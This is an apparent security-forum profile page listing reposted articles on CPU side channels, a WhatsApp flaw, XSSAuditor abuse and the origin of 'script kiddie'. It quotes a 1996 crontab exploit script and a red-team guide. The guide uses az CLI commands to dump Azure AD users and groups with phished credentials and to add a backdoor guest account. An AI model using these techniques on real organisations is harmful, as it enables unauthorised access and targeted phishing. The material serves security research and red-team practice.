Jump to content

Nytro

Administrators
  • Content Count

    16385
  • Joined

  • Last visited

  • Days Won

    262

Nytro last won the day on May 17

Nytro had the most liked content!

Community Reputation

3667 Excellent

About Nytro

  • Rank
    Administrator
  • Birthday 03/11/1991

Recent Profile Visitors

25725 profile views
  1. Adaugai un RSS feed nou, il gasiti pe /forum in dreapta jos. Se cheama "Technical Forums" si exclude Offtopic si altele. Poate fi util.
  2. Activai o functionalitate (gasita intamplator) ca permite sa selectati cum sa arate forumul. Cred ca e destul de vizibila (pe /forum).
  3. Nu te baza pe facultate pentru a invatat securitate. Exista ceva programe de master, insa nu stiu nimic de licenta. Fa o facultate de informatica, o sa te ajute sa inveti cate ceva din mai multe domenii. Cauta posturi pe forum legate de alegerea facultatii. Intre timp, invata singur, fa CTF-uri, Internetul e plin de resurse (vezi sectiunea Tutoriale Engleza de aici de pe forum).
  4. Hey folks, time for some good ol' fashioned investigation! Open Rights Group & Who Targets Me are monitoring European electrions. GDPR breaches, privacy infringements, the works! They released a browser extension that records every political ad served to users on Facebook, including the data they used to target individuals. If you use Facebook, install the extension and browse your Facebook feed freely. If you aren't on Facebook, help us out by spreading the word. No additional personal information is recorded. If you have any concerns about this, ping me! We can pool all our questions and I'll send them an open letter, from the Security Espresso community. This information is via our good friends at Asociatia pentru Tehnologie si Internet. https://whotargets.me/en/ https://www.openrightsgroup.org/campaigns/who-targets-me-faq Via: https://www.facebook.com/secespresso/
  5. Adventures in Video Conferencing - Natalie Silvanovich - INFILTRATE 2019 INFILTRATE 2020 will be held April 23/24, Miami Beach, Florida, infiltratecon.com
  6. System Down: A systemd-journald Exploit Read the advisory Accompanying exploit: system-down.tar.gz Sursa: https://www.qualys.com/research/security-advisories/
  7. RIDL and Fallout: MDS attacks Attacks on the newly-disclosed "MDS" hardware vulnerabilities in Intel CPUs The RIDL and Fallout speculative execution attacks allow attackers to leak confidential data across arbitrary security boundaries on a victim system, for instance compromising data held in the cloud or leaking your information to malicious websites. Our attacks leak data by exploiting the newly disclosed Microarchitectural Data Sampling (or MDS) side-channel vulnerabilities in Intel CPUs. Unlike existing attacks, our attacks can leak arbitrary in-flight data from CPU-internal buffers (Line Fill Buffers, Load Ports, Store Buffers), including data never stored in CPU caches. We show that existing defenses against speculative execution attacks are inadequate, and in some cases actually make things worse. Attackers can use our attacks to obtain sensitive data despite mitigations, due to vulnerabilities deep inside Intel CPUs. Sursa: https://mdsattacks.com/
  8. ZombieLoad Attack Watch out! Your processor resurrects your private browsing-history and other sensitive data. After Meltdown, Spectre, and Foreshadow, we discovered more critical vulnerabilities in modern processors. The ZombieLoad attack allows stealing sensitive data and keys while the computer accesses them. While programs normally only see their own data, a malicious program can exploit the fill buffers to get hold of secrets currently processed by other running programs. These secrets can be user-level secrets, such as browser history, website content, user keys, and passwords, or system-level secrets, such as disk encryption keys. The attack does not only work on personal computers but can also be exploited in the cloud. Make sure to get the latest updates for your operating system! Sursa: https://zombieloadattack.com/
  9. The NSO WhatsApp Vulnerability – This is How It Happened May 14, 2019 Earlier today the Financial Times published that there is a critical vulnerability in the popular WhatsApp messaging application and that it is actively being used to inject spyware into victims phones. According to the report, attackers only need to issue specially crafted VoIP calls to the victim in order to infect it with no user interaction required for the attack to succeed. As WhatsApp is used by 1.5bn people worldwide, both on Android phones and iPhones, the messaging and voice application is known to be a popular target for hackers and governments alike. Immediately after the publication went live, Check Point Research began analyzing the details about the now-patched vulnerability, referred to as CVE-2019-3568. Here is the first technical analysis to explain how it happened. Technical Details Facebook’s advisory describe it as a “buffer overflow vulnerability” in the SRTCP protocol, so we started by patch-diffing the new WhatsApp version for android (v2.19.134, 32-bit program) in search for a matching code fix. Soon enough we stumbled upon two code fixes in the SRTCP module: Size Check #1 The patched function is a major RTCP handler function, and the added fix can be found right at its start. The added check verifies the length argument against a maximal size of 1480 bytes (0x5C8). During our debugging session we confirmed that this is indeed a major function in the RTCP module and that it is called even before the WhatsApp voice call is answered. Size Check #2 In the flow between the two functions we can see that the same length variable is now used twice during the newly added sanitation checks (marked in blue): Validation that the packet’s length field doesn’t exceed the length. Additional check that the length is one again <= 1480, right before a memory copy. As one can see, the second check includes a newly added log string that specifically say it is a sanitation check to avoid a possible overflow. Conclusion WhatsApp implemented their own implementation of the complex SRTCP protocol, and it is implemented in native code, i.e. C/C++ and not Java. During our patch analysis of CVE-2019-3568, we found two newly added size checks that are explicitly described as sanitation checks against memory overflows when parsing and handling the network packets in memory. As the entire SRTCP module is pretty big, there could be additional patches that we’ve missed. In addition, judging by the nature of the fixed vulnerabilities and by the complexity of the mentioned module, there is also a probable chance that there are still additional unknown parsing vulnerabilities in this module. Sursa: https://research.checkpoint.com/the-nso-whatsapp-vulnerability-this-is-how-it-happened/
  10. Adversarial Examples for Electrocardiograms Xintian Han, Yuxuan Hu, Luca Foschini, Larry Chinitz, Lior Jankelson, Rajesh Ranganath (Submitted on 13 May 2019) Among all physiological signals, electrocardiogram (ECG) has seen some of the largest expansion in both medical and recreational applications with the rise of single-lead versions. These versions are embedded in medical devices and wearable products such as the injectable Medtronic Linq monitor, the iRhythm Ziopatch wearable monitor, and the Apple Watch Series 4. Recently, deep neural networks have been used to classify ECGs, outperforming even physicians specialized in cardiac electrophysiology. However, deep learning classifiers have been shown to be brittle to adversarial examples, including in medical-related tasks. Yet, traditional attack methods such as projected gradient descent (PGD) create examples that introduce square wave artifacts that are not physiological. Here, we develop a method to construct smoothed adversarial examples. We chose to focus on models learned on the data from the 2017 PhysioNet/Computing-in-Cardiology Challenge for single lead ECG classification. For this model, we utilized a new technique to generate smoothed examples to produce signals that are 1) indistinguishable to cardiologists from the original examples 2) incorrectly classified by the neural network. Further, we show that adversarial examples are not rare. Deep neural networks that have achieved state-of-the-art performance fail to classify smoothed adversarial ECGs that look real to clinical experts. Subjects: Signal Processing (eess.SP); Cryptography and Security (cs.CR); Machine Learning (cs.LG); Machine Learning (stat.ML) Cite as: arXiv:1905.05163 [eess.SP] (or arXiv:1905.05163v1 [eess.SP] for this version) Submission history From: Xintian Han [view email] [v1] Mon, 13 May 2019 17:47:25 UTC (1,236 KB) Which authors of this paper are endorsers? | Disable MathJax (What is MathJax?) Sursa: https://arxiv.org/abs/1905.05163
  11. Chrome switching the XSSAuditor to filter mode re-enables old attack Fri 10 May 2019 Recently, Google Chrome changed the default mode for their Cross-Site Scripting filter XSSAuditor from block to filter. This means that instead of blocking the page load completely, XSSAuditor will now continue rendering the page but modify the bits that have been detected as an XSS issue. In this blog post, I will argue that the filter mode is a dangerous approach by re-stating the arguments from the whitepaper titled X-Frame-Options: All about Clickjacking? that I co-authored with Mario Heiderich in 2013. After that, I will elaborate XSSAuditor's other shortocmings and revisit the history of back-and-forth in its default settings. In the end, I hope to convince you that XSSAuditor's contribution is not just neglegible but really negative and should therefore be removed completely. JavaScript à la Carte When you allow websites to frame you, you basically give them full permission to decide, what part of JavaScript of your very own script can be executed and what cannot. That sounds crazy right? So, let’s say you have three script blocks on your website. The website that frames you doesn’t mind two of them - but really hates the third one. maybe a framebuster, maybe some other script relevant for security purposes. So the website that frames you just turns that one script block off - and leave the other two intact. Now how does that work? Well, it’s easy. All the framing website is doing, is using the browser’s XSS filter to selectively kill JavaScript on your page. This has been working in IE some years ago but doesn’t anymore - but it still works perfectly fine in Chrome. Let’s have a look at an annotated code example. Here is the evil website, framing your website on example.com and sending something that looks like an attempt to XSS you! Only that you don’t have any XSS bugs. The injection is fake - and resembles a part of the JavaScript that you actually use on your site: <iframe src="//example.com/index.php?code=%3Cscript%20src=%22/js/security-libraries.js%22%3E%3C/script%3E"></iframe> Now we have your website. The content of the code parameter above is part of your website anyway - no injection here, just a match between URL and site content: <!doctype html> <h1>HELLO</h1> <script src="/js/security-libraries.js"></script> <script> // assumes that the libraries are included </script> The effect is compelling. The load of the security libraries will be blocked by Chrome’s XSS Auditor, violating the assumption in the following script block, which will run as usual. Existing and Future Countermeasures So, as we see defaulting to filter was a bad decision and it can be overriden with the X-XSS-Protection: 1; mode=block header. You could also disallow websites from putting you in an iframe with X-Frame-Options: DENY, but it still leaves an attack vector as your websites could be opened as a top-level window. (The Cross-Origin-Opener-Policy will help, but does not yet ship in any major browser). Surely, Chrome might fix that one bug and stop exposing onerror from internal error pages . But that's not enough. Other shortcomings of the XSSAuditor XSSAuditor has numerous problems in detecting XSS. In fact, there are so many that the Chrome Security Team does not treat bypasses as security bugs in Chromium. For example, the XSSAuditor scans parameters individually and thus allows for easy bypasses on pages that have multiple injections points, as an attacker can just split their payload in half. Furthermore, XSSAuditor is only relevant for reflected XSS vulnerabilities. It is completely useless for other XSS vulnerabilities like persistent XSS, Mutation XSS (mXSS) or DOM XSS. DOM XSS has become more prevalent with the rise of JavaScript libraries and frameworks such as jQuery or AngularJS. In fact, a 2017 research paper about exploiting DOM XSS through so-called script gadgets discovered that XSSAuditor is easily bypassed in 13 out of 16 tested JS frameworks History of XSSAuditor defaults Here's a rough timeline 2010 - Paper "Regular expressions considered harmful in client-side XSS filters" published. Outlining design of the XSSAuditor, Chrome ships it with default to filter 2016 - Chrome switching to block due to the attacks with non-existing injections November 2018 - Chrome error pages can be observed in an iframe, due to the onerror event being triggered twice, which allows for cross-site leak attacks ](https://github.com/xsleaks/xsleaks/wiki/Browser-Side-Channels#xss-filters). January 2019 (hitting Chrome stable in April 2019) - XSSAuditor switching back to filter Conclusion Taking all things into considerations, I'd highly suggest removing the XSSAuditor from Chrome completely. In fact, Microsoft has announced they'd remove the XSS filter from Edge last year. Unfortunately, a suggestion to retire XSSAuditor initiated by the Google Security Team was eventually dismissed by the Chrome Security Team. This blog post does not represent the position of my employer. Thanks to Mario Heiderich for providing valuable feedback: Supporting arguments and useful links are his. Mistakes are all mine. Other posts Chrome switching the XSSAuditor to filter mode re-enables old attack Challenge Write-up: Subresource Integrity in Service Workers Finding the SqueezeBox Radio Default SSH Passwort New CSP directive to make Subresource Integrity mandatory (`require-sri-for`) Firefox OS apps and beyond Teacher's Pinboard Write-up A CDN that can not XSS you: Using Subresource Integrity The Twitter Gazebo German Firefox 1.0 ad (OCR) My thoughts on Tor appliances Subresource Integrity Revoke App Permissions on Firefox OS (Self) XSS at Mozilla's internal Phonebook Tales of Python's Encoding On the X-Frame-Options Security Header html2dom Security Review: HTML sanitizer in Thunderbird Week 29 2013 The First Post Sursa: https://frederik-braun.com/xssauditor-bad.html
  12. dsync IDAPython plugin that synchronizes decompiled and disassembled code views. Please refer to comments in source code for more details. Requires 7.2 Sursa: https://github.com/patois/dsync
  13. AntiFuzz: Impeding Fuzzing Audits of Binary Executables Authors: Emre Güler, Cornelius Aschermann, Ali Abbasi, and Thorsten Holz, Ruhr-Universität Bochum Abstract: A general defense strategy in computer security is to increase the cost of successful attacks in both computational resources as well as human time. In the area of binary security, this is commonly done by using obfuscation methods to hinder reverse engineering and the search for software vulnerabilities. However, recent trends in automated bug finding changed the modus operandi. Nowadays it is very common for bugs to be found by various fuzzing tools. Due to ever-increasing amounts of automation and research on better fuzzing strategies, large-scale, dragnet-style fuzzing of many hundreds of targets becomes viable. As we show, current obfuscation techniques are aimed at increasing the cost of human understanding and do little to slow down fuzzing. In this paper, we introduce several techniques to protect a binary executable against an analysis with automated bug finding approaches that are based on fuzzing, symbolic/concolic execution, and taint-assisted fuzzing (commonly known as hybrid fuzzing). More specifically, we perform a systematic analysis of the fundamental assumptions of bug finding tools and develop general countermeasures for each assumption. Note that these techniques are not designed to target specific implementations of fuzzing tools, but address general assumptions that bug finding tools necessarily depend on. Our evaluation demonstrates that these techniques effectively impede fuzzing audits, while introducing a negligible performance overhead. Just as obfuscation techniques increase the amount of human labor needed to find a vulnerability, our techniques render automated fuzzing-based approaches futile. Open Access Media USENIX is committed to Open Access to the research presented at our events. Papers and proceedings are freely available to everyone once the event begins. Any video, audio, and/or slides that are posted after the event are also free and open to everyone. Support USENIX and our commitment to Open Access. Guler Paper (Prepublication) PDF BibTeX Sursa: https://www.usenix.org/conference/usenixsecurity19/presentation/guler
  14. The Origin of Script Kiddie - Hacker Etymology 12 May 2019 Blog TL;DR The term script kiddie probably originated around 1994, but the first public record is from 1996. watch on YouTube Introduction In my early videos I used the slogan "don’t be a script kiddie" in the intro. And quite some time ago I got the following YouTube comment about it: Is "don’t be a script kiddie" a reference to Mr. Robot? Or is it already a thing in general? I think it would be interesting to look for the origin of the term script kiddie and at the same time it gives us an excuse to look into the past, to better understand on what our community is built upon and somewhat honour and remember it. I wish I was old enough to have experienced that time myself to tell you first-hand stories, but unfortunately I’m born in the early 90s and so I’m merely an observer and explorer of the publicly available historical records. But there is fascinating stuff out there that I want to share with you. Phrack The first resource I wanted to check is Phrack. Phrack is probably the longest running ezine as it was started in 1985 by Taran King and Knight Lightning. source: http://www.erik.co.uk/hackerpix/ I highly encourage you to just randomly click around through those old issues and read some random articles. You will find stuff about operating systems and various technologies you might have never heard about - because they don’t exist anymore. But you also find traces of the humans behind all this through the Phrack Pro-Philes and other articles. Maybe checkout the famous hacker manifesto from 1986 - The Conscience of a Hacker. It was written by a teenager, calling himself The Mentor, who probably never thought that his rage induced philosophical writing would go on to influence a whole generation of hackers. But it becomes even more fascinating with the privilege of being here in the future, right now, and looking back. I found this talk from 2002 by The Mentor and he is now a grown man reflecting on his experience about this. It’s emotional and human. And in the end this is what the hacker culture is. It’s full of humans with complex emotions, we shouldn't forget that. Watch on YouTube Anyway, I’m getting really distracted here. Back to script kiddie research. The oldest occurrence of script kiddie we can find is from issue 54, released in 1998, article 9 and 11. [...] when someone posts (say) a root hole in Sun's comsat daemon, our little cracker could grep his list for 'UDP/512' and 'Solaris 2.6' and he immediately has pages and pages of rootable boxes. It should be noted that this is SCRIPT KIDDIE behavior. And the other is a sarcastic comment about rootshell.com being hacked and them handing over data to law enforcement: Lets give out scripts that help every clueless script kiddie break into thousands of sites worldwide. then narc off the one that breaks into us. So this issue is from 1998, which is already the 90s, but I’m sure there have to be earlier occurrences. Wikipedia is often pretty good with information and references, but unfortunately there are only links going back to the 2000s. Yet Another Bulletin Board System Then I looked at the textfiles.com archive, which is ran by Jason Scott. This is a huuuge archive of old zines, bulletin boards, mailing lists, and more. And so I started to search through that and indeed I found some interesting traces from around 1993/1994 in a BBS called yabbs - yet another bulletin board system created by Alex Wetmore in 1991 at Carnegie Mellon. The first interesting find is from October 1993: Enjoy your K-Rad elite kodez kiddies Here the term kiddie is not prefixed with script, and I’m not sure if it’s “elite code, kiddies” or elite "code kiddies”. But code and script is almost a synonymous and it seems to be used in a very similar derogatory way as the modern terminology. Then in June 1994 there is this message: Codez kiddies just don’t seem to understand that those scripts had to come from somwhere. Hacking has fizzled down to kids running scripts to show off at a 2600 meet. We have again a reference to “codez kiddies” but now the term script also starts to appear in the same sentence. And then in July 1994 it got combined to: Even 99% of the wanker script codez kiddies knows enough to not run scripts on the Department of Defense. Isn’t this fascinating! I believe that 1994 is the year where the term script kiddie started to appear. But this example is still not 100% the modern term... The First Script Kiddie The earliest usage of literally script kiddie I was only able to find in an exploit from 1996. [r00t.1] [crongrab] [public release] Crontab has a bug. You run crontab -e, then you goto a shell, relink the temp fire that crontab is having you edit, and presto, it is now your property. This bug has been confirmed on various versions of OSF/1, Digital UNIX 3.x, and AIX 3.x If, while running my script, you somehow manage to mangle up your whole system, or perhaps do something stupid that will place you in jail, then neither I, nor sirsyko, nor the other fine folks of r00t are responsible. Personally, I hope my script eats your cat and causes swarms of locuses to decend down upon you, but I am not responsible if they do. --kmem. [-- Script kiddies cut here -- ] #!/bin/sh # This bug was discovered by sirsyko Thu Mar 21 00:45:27 EST 1996 # This crappy exploit script was written by kmem. # and remember if ur not owned by r00t, ur not worth owning # # usage: crongrab echo Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX, others??? echo if this did not work on OSF/1 read the comments -- it is easy to fix. if [ $# -ne '2' ]; then echo "usage: $0 " exit fi HI_MUDGE=$1 YUMMY=$2 export HI_MUDGE UNAME=`uname` GIRLIES="1.awk aix.sed myedit.sh myedit.c .r00t-tmp1" #SETUP the awk script cat >1.awk <aix.sed <myedit.sh <.r00t-tmp1 sed -f aix.sed .r00t-tmp1 > $YUMMY elif [ $UNAME = "OSF1" ]; then #FOR DIGITAL UNIX 3.X or higher machines uncomment these 2 lines crontab -e 2>.r00t-tmp1 awk -f 1.awk .r00t-tmp1 >$YUMMY # FOR PRE DIGITAL UNIX 3.X machines uncomment this line #crontab -l 2>&1 > $YUMMY else echo "Sorry, dont know your OS. But you are a bright boy, read the skript and" echo "Figger it out." exit fi echo "Checkit out - $YUMMY" echo "sirsyko and kmem kickin it out." echo "r00t" #cleanup our mess crontab -r VISUAL=$oldvis EDITOR=$oldedit HI_MUDGE='' YUMMY='' export HI_MUDGE export YUMMY export VISUAL export EDITOR rm -f $GIRLIES [-- Script kiddies cut here -- ] THERE IT IS! This bug was discovered by sirsyko on Thursday 21st Mar of 1996, just after midnight. I guess nothing has changed with hacking into the night. And this exploit script was written by kmem. You know what’s cool? With a bit of digging I actually found party pictures from around 1996/97 from kmem and sirsyko. I’m so grateful that there was some record keeping through pictures from that time, which takes away some of the mysticism that surrounds those early hackers - they look like normal dudes! But anyway, is this really the first time that somebody used the term script kiddie? Is this where it all started? Well… When I was asking around, somebody reminded me of Cunningham's Law the best way to get the right answer on the internet is not to ask a question; it's to post the wrong answer. so... I DECLARE THIS EXPLOIT TO BE THE FIRST USAGE OF THE TERM SCRIPT KIDDIE! IT’S. A. FACT! Epilogue I’m aware that a lot of the hacking culture happened in private boards, forums and chat rooms. But maybe somebody out there has old (non-)public IRC logs and can grep over it for us. I think it would be really cool to find more traces about the evolution of this term. Also I would LOVE to hear the story behind any exploit from the 90s. How did you find it, did you share it, how did you learn what you knew, what kind of research did you do yourself, who was influential to you, did anybody steal your bug, were there bug collisions, what was it like to experience a buffer overflow for the first time, etc. I think there are a lot of fascinating stories hidden behind those zines and exploits from that time and they haven’t been told yet. I don’t want them to be forgotten - please share your story. Update I was just sent this talk by Alex Ivanov and @JohnDunlap2 from HOPE 2018. They saw my tweet from 2018 about the exploit in 1996, but they go even further! A lot of info about k-rad, the first 1337 speak, etc. LiveOverflow wannabe hacker... Sursa: https://liveoverflow.com/the-origin-of-script-kiddie-hacker-etymology/
  15. Red Teaming Microsoft: Part 1 – Active Directory Leaks via Azure Mike Felch// With so many Microsoft technologies, services, integrations, applications, and configurations it can create a great deal of difficulty just to manage everything. Now imagine trying to secure an environment that goes well beyond the perimeter. While moving everything to a cloud provider can provide amazing return in scalability, functionality, and even savings, it can also create major blind-spots. Over the past year, I have been looking into ways to target organizations that utilize Microsoft as their cloud provider. I hope to release a number of different techniques that have been extremely beneficial in uncovering these blind-spots, much like the research Beau Bullock (@dafthack) and I did when we focused our scope on Google. I won’t begin to mislead you, I am no Microsoft expert. In fact, the more I read about the products and services the more I felt lost. While over the past year I’ve been able to maneuver through and bend these technologies in order to target the organizations better from a red team perspective, I struggled trying to understand many different concepts. What is the default configuration for this? Is this provided by default? Is this syncing with everything? If I make changes here, do they propagate back? Why not? The list goes on and on. When I’ve shared some of these techniques privately it was inevitable that a question would immediately follow. While I feel bringing a problem without a solution is irresponsible, there may be times like now where solutions aren’t black and white. My advice is to know your environment, know your technologies, and if you aren’t sure then reach out to your service provider so you can be sure. The Microsoft Landscape So you’ve been running Microsoft Active Directory and Exchange on-prem for years but want to quickly deploy Microsoft Office to your employees while also providing them with access to a webmail portal, Sharepoint, and SSO for some internal applications. Somewhere along the way you decided to migrate to Office 365 and everything works well! All your users can authenticate with their network credentials and their email works great! Would you consider yourself an on-prem organization still or are you in the infamous cloud now? Maybe you took a hybrid approach and did both. Microsoft provides an amazing amount of integrations that they support but how do you know if you are managing everything correctly? A Hypothetical Complex Situation For managing users on-prem there’s the traditional Microsoft AD. For managing users in cloud services you could leverage Azure AD. For mail there’s Exchange on-prem but you could always move email to Exchange online. If you want the full suite of Microsoft Office there’s Office 365 but I think that routes through Exchange online in a Microsoft multi-tenant environment anyhow, so you could technically be using both but paying for one. Since you paid for Office 365 Business, you were also provided a number of services like Skype and OneDrive despite using GDrive or Box for corporate file sharing. You enroll in a multi-factor solution with SMS tokens being the default delivery mechanism but for some reason your users can still authenticate with Outlook without needing MFA… weird.. (Major thanks to Microsoft EWS) Overall, everything just works and for that we have to thank Azure AD Connect.. or is it Azure AD Synchronization Services.. or are we still running old school DirSync with Forefront Identity Manager? Whatever it is, it’s working and that’s all that matters! So.. What’s the Big Deal? A number of problems are created in the situation just illustrated and there is very little a blue team can do to defend or respond to a number of different attacks ranging from dumping active directory remotely to bypassing and even hijacking multi-factor authentication for users. Understanding who is who within an organizational department is typically done in the reconnaissance phase of an engagement through third-party services like LinkedIn or other OSINT techniques. If you are on the internal network then revisiting this step is crucial because you need to understand deeper details of the organization like what groups are configured and who are the members of those groups. This is vital in being able to successfully pivot to relevant machines and targeting users based on their access so that escalation can be accomplished. But what if you aren’t on the internal network but still need to determine who to target? Even better, what if the target gems of the organization are hosted in the cloud and you never actually have to hit the internal network? With Microsoft, if you are using any cloud services (Office 365, Exchange Online, etc) with Active Directory (on-prem or in Azure) then an attacker is one credential away from being able to leak your entire Active Directory structure thanks to Azure AD. Step 1) Authenticate to your webmail portal (i.e. https://webmail.domain.com/) Step 2) Change your browser URL to: https://azure.microsoft.com/ Step 3) Pick the account from the active sessions Step 4) Select Azure Active Directory and enjoy! This creates a number of bad situations. For instance, if we were able to export all the users and groups we would have a very nice list of employees and the groups they are a part of. We can also learn what group we need to land in for VPN, domain administration, database access, cloud servers, or financial data. What’s also nice about Azure AD is that it holds the device information for each user so we can see if they are using a Mac, Windows machine, or iPhone along with the version information (i.e. Windows 10.0.16299.0). As if all this wasn’t great already, we can also learn about all the business applications with their endpoints, service principal names, other domain names, and even the virtual resources (i.e. virtual machines, networks, databases) that a user might have access to. But Wait, There’s More! An added benefit to authenticating to the Azure portal as a regular user is that you can create a backdoor… err… I mean a “Guest” account. How super convenient! Step 1) Click “Azure Active Directory” Step 2) Click “Users” under the Manage section Step 3) Click “New Guest User” and invite yourself Depending on their configuration, it may or may not sync back to the internal network. In fact, while creating guest accounts is on by default — I’ve only verified one customer where Azure AD Connect was a bi-directional sync allowing guest accounts to authenticate, enroll a multi-factor device and VPN internally. This is an important configuration component for you to understand since it can create a bad day. Azure for Red Teams Accessing the Azure portal through the web browser is great and has many awesome advantages but I have yet to find a way to export the information directly. I started to write a tool that would authenticate and do it in an automated fashion but it felt cumbersome and I knew with all of these awesome technologies tied together that Microsoft has solved this problem for me. There were a number of solutions I came across, some of them are: Azure CLI (AZ CLI) Being a Linux user, I naturally gravitated towards AZ CLI. Partially because I pipe as much data into one-liners as possible and partially because I over-engineer tools in .NET. Using AZ CLI is a quick and easy way to authenticate against the OAUTH for Azure while also quickly exporting the raw data. In this post, we will focus on this solution. Azure Powershell With a rise in awesome Powershell tools like Powershell Empire and MailSniper, I’m amazed that Azure Powershell hasn’t made its way into one of these tools. There are a massive number of Active Directory Cmdlets to interact with. To get started, simply install Azure RM Powershell then run: Connect-AzureRmAccount Azure .NET I am one of those weird nerds who grew up on Linux but wrote C# for a significant portion of my career. Because of this, having an Azure .NET library to interact with Active Directory is encouraging. I didn’t dig too much into these libraries but from a high-level it seems they are some sort of wrapper for the Active Directory Graph API. Let’s Dig In! As I previously mentioned, we will focus on interacting with Azure using AZ CLI. In order to get started, we have to first establish an active session with Azure. On red teams where the engagement involves an organization using Microsoft or Google services, I rarely try to go straight to a shell on the internal network. I will normally use a tool I wrote called CredSniper to phish credentials and multi-factor tokens then just authenticate as that user in pursuit of sensitive emails, files, access, information and VPN. Will that presupposition, we will assume valid credentials were already obtained somehow. Install AZ CLI You will need to add the Microsoft source to apt (assuming Linux), install the Microsoft signing key, and then install Azure CLI: AZ_REPO=$(lsb_release -cs) echo "deb [arch=amd64] https://packages.microsoft.com/repos/azure-cli/ $AZ_REPO main" | sudo tee /etc/apt/sources.list.d/azure-cli.list curl -L https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - sudo apt-get install apt-transport-https sudo apt-get update && sudo apt-get install azure-cli Authentication via Web Session After everything is installed correctly, you will need to create a session to Azure using the credentials you already obtained. The easiest way to do that is by authenticating using ADFS or OWA in a normal browser then: az login This will generate the OAUTH tokens locally, open a browser tab to the authentication page and let you select an account based on the ones you are already authenticated with. Once you select the account, the local OAUTH tokens will be validated by the server and you won’t have to do that again unless they expire or get destroyed. You can also pass the –use-device-code flag which will generate a token you provide to https://microsoft.com/devicelogin. Dumping Users Now on to my favorite part! There have been numerous techniques for extracting the GAL previously researched, such as using the FindPeople and GetPeopleFilter web service methods in OWA. These techniques have been an excellent resource for red teamers but they definitely have their limitations on what data is available, how long it takes to enumerate users, how loud it is due to the number of web requests required, and how it occasionally breaks. With AZ CLI, it’s super easy to extract all the directory information for each user. In the examples below, I apply a JMESPath filter to extract the data I care about. I can also export as a table, JSON, or in TSV format! All Users az ad user list --output=table --query='[].{Created:createdDateTime,UPN:userPrincipalName,Name:displayName,Title:jobTitle,Department:department,Email:mail,UserId:mailNickname,Phone:telephoneNumber,Mobile:mobile,Enabled:accountEnabled}' Specific User If you know the UPN of the target account, you can retrieve specific accounts by passing in the —upn flag. This is convenient if you are wanting to dig into the Active Directory information for a particular account. In the example below, you will notice I supplied the JSON format instead of the table output. az ad user list --output=json --query='[].{Created:createdDateTime,UPN:userPrincipalName,Name:displayName,Title:jobTitle,Department:department,Email:mail,UserId:mailNickname,Phone:telephoneNumber,Mobile:mobile,Enabled:accountEnabled}' --upn='<upn>' Dumping Groups My next favorite function is the ability to dump groups. Understanding how groups are used within an organization can provide specific insight into the areas of the business, the users, and who the admins are. AZ CLI provides a few useful commands that can assist here. All Groups The first thing I usually do is just export all the groups. Then I can grep around for certain keywords: Admin, VPN, Finance, Amazon, Azure, Oracle, VDI, Developer, etc. While there is other group metadata available, I tend to just grab the name and description. az ad group list --output=json --query='[].{Group:displayName,Description:description}' Specific Group Members Once you have reviewed the groups and cherry-picked the interesting ones, next it’s useful to dump the group members. This will give you an excellent list of targets that are a part of the interesting groups — prime targets for spear phishing! Against popular opinion, I have personally found that the technical ability and title do not lower the likelihood an intended target is more likely to avoid handing over their credentials (and even MFA token). In other words, everyone is susceptible so I usually target back-end engineers and devops teams because they tend to have the most access plus I can usually remain external to the network yet still access private GitHub/GitLab code repositories for creds, Jenkins build servers for shells, OneDrive/GDrive file shares for sensitive data, Slack teams for sensitive files and a range of other third-party services. Once again, why go internal if you don’t have to. az ad group member list --output=json --query='[].{Created:createdDateTime,UPN:userPrincipalName,Name:displayName,Title:jobTitle,Department:department,Email:mail,UserId:mailNickname,Phone:telephoneNumber,Mobile:mobile,Enabled:accountEnabled}' --group='<group name>' Dumping Applications & Service Principals Another nice feature Microsoft provides is the ability to register applications that use SSO/ADFS or integrate with other technologies. A lot of companies utilize this for internal applications. The reason this is nice for red teamers is because the metadata associated with the applications can provide deeper insight into attack surfaces that may have not been discovered during reconnaissance, like URLs. All Applications az ad app list --output=table --query='[].{Name:displayName,URL:homepage}' Specific Application In the below screenshot, you see we obtained the URL for the Splunk instance by examining the metadata associated with the registered application in Azure. az ad app list --output=json --identifier-uri='<uri>' All Service Principals az ad sp list --output=table --query='[].{Name:displayName,Enabled:accountEnabled,URL:homepage,Publisher:publisherName,MetadataURL:samlMetadataUrl}' Specific Service Principal az ad sp list --output=table --display-name='<display name>' Advanced Filtering with JMESPath You might have noticed in the above examples that I try to limit the amount of data that is returned. This is mainly because I try to snag what I need instead of everything. The way AZ CLI handles this is by using the –query flag with a JMESPath query. This is a standard query language for interacting with JSON. I did notice a few bugs with AZ CLI when combining the query flag with the ‘show’ built-in functions. The other thing to note is that the default response format is JSON which means if you plan on using a query filter you need to specify the correct case-sensitive naming conventions. There was a bit of inconsistency between the names for the different formats. If you used the table format, it might capitalize when JSON had lowercase. Disable Access to Azure Portal I spent a bit of time trying to make sense of what to disable, how to prevent access, how to limit, what to monitor, and even reached out to people on Twitter (thanks Josh Rickard!). I appreciate all the people who reached out to help make sense of this madness. I suppose I should learn the Microsoft ecosystem more, in hopes of offering better suggestions. Until then, I offer you a way to disable the Azure Portal access to users. I haven’t tested this and can’t be sure if this includes AZ CLI, Azure RM Powershell, and the Microsoft Graph API but it’s definitely a start. Step 1) Log in to Azure using a Global Administrator account https://portal.azure.com Step 2) On the left panel, choose ‘Azure Active Directory’ Step 3) Select ‘Users Settings’ Step 4) Select ‘Restrict access to Azure AD administration portal’ An alternative is to look into Conditional Access Policies: https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/overview Coming Soon! There are a number of different tools out there for testing AWS environments and even new tools that have come out recently for capturing cloud credentials like SharpCloud. Cloud environments seem to be a commonly overlooked attack surface. I will be releasing a (currently private) red team framework for interacting with cloud environments, called CloudBurst. It’s a plugginable framework that gives users the ability to interact with different cloud providers to capture, compromise, and exfil data. Join the BHIS Blog Mailing List – get notified when we post new blogs, webcasts, and podcasts. Join 1,110 other subscribers Sursa: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
×
×
  • Create New...